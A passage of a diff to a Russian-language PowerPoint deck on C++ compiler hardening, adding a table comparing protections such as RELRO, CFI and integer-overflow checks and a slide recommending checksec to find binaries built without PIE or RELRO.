+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Только </a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>unsafe/</a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>внешний код</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Есть биндинги к </a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0" err="1"/>
+                        <a:t>hardened_malloc</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0" err="1">
+                          <a:hlinkClick r:id="rId7"/>
+                        </a:rPr>
+                        <a:t>Prooflink</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="492283927"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="406450">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>Full RELRO</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Только </a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>unsafe/</a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>внешний код</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Включена</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0" err="1">
+                          <a:hlinkClick r:id="rId8"/>
+                        </a:rPr>
+                        <a:t>Prooflink</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="654146900"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="406450">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0" err="1"/>
+                        <a:t>Autoinitialization</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Нет</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>N/A</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Уже есть в языке</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2180500840"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="406450">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>Integer Overflow</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Актуальна</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Есть опция</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>(дефолтно отключена)</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="120989246"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="406450">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>CFI</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>Только </a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>unsafe/</a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>внешний код</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0"/>
+                        <a:t>Nightly-</a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="ru-RU" dirty="0"/>
+                        <a:t>опция</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="en-US" dirty="0" err="1">
+                          <a:hlinkClick r:id="rId9"/>
+                        </a:rPr>
+                        <a:t>Prooflink</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3025595264"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+            </a:tbl>
+          </a:graphicData>
+        </a:graphic>
+      </p:graphicFrame>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -26561,7 +27606,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC7532A-964A-431E-A4F5-80DD903BB997}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{527B94E6-AC75-496A-80B4-C52365ABC84D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -26578,8 +27623,12 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>TODO</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Что стоит сделать </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>?</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -26589,7 +27638,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C484971-452F-45F6-AD84-582487E77763}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861B54C4-30F2-41AC-AD28-53F5FBB73FC4}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -26602,140 +27651,108 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit/>
-          </a:bodyPr>
+          <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Информация о замерах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в приложении</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
+              <a:t>Проверить дефолтные опции при сборке продуктового кода и дистрибутива</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Какие проверялись версии дистрибутивов</a:t>
-            </a:r>
+              <a:t>Решить с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Security Team </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>какие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardening</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>-методы включить</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Поиск проблемных программ (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>no-pie, etc.) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>можно автоматизировать с помощью </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>утилиты </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>checksec</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как считались </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CVE, KEV</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (скрипты</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
+              <a:t>Может проверить наличие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>noexecstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, PIE, _FORTIFY_SOURCE, RELRO, etc.</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Ссылки на примеры</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (Stack Clashing)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как запустить бенчмарки </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Отдельный слайд с рекомендуемыми ссылками</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Слайд с рекомендациями</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверить дефолтные опции в дистро, решить с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Security Team </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>какие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardening</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>-методы включить в проде</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как искать проблемные программы (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>no-pie, etc.) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>с помощью </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>checksec</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
+              <a:t>Пока </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(?) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не поддерживает более новые защиты</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: CFI (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>все виды</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>), Stack Clashing, Safe Stack, etc.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -26743,7 +27760,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4165890631"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1359780015"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -26754,6 +27771,96 @@
 </file>
 
 <file path=ppt/slides/slide87.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE0E5C5-D212-445A-B152-EE70980D9FFC}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Что почитать </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947FFF96-69F7-4C4A-8AAB-7A04BDA9C83C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>TODO</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3985882342"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide88.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -26793,7 +27900,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Спасибо за внимание</a:t>
+              <a:t>Спасибо за внимание !</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -26822,19 +27929,162 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Полная версия слайдов доступна по адресу</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/RU.pptx</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Вопросы</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t> ?</a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Picture 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC4F7E3-DA50-4105-92F5-2DAFFC744B19}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4048685" y="2932580"/>
+            <a:ext cx="2857500" cy="2857500"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide89.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8E47BF-47BB-42B9-B025-B0A5D6833D5D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Приложения</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Text Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448D2064-70B6-47CB-BA79-87C67150F18F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2401149323"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -27151,6 +28401,182 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1682534789"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
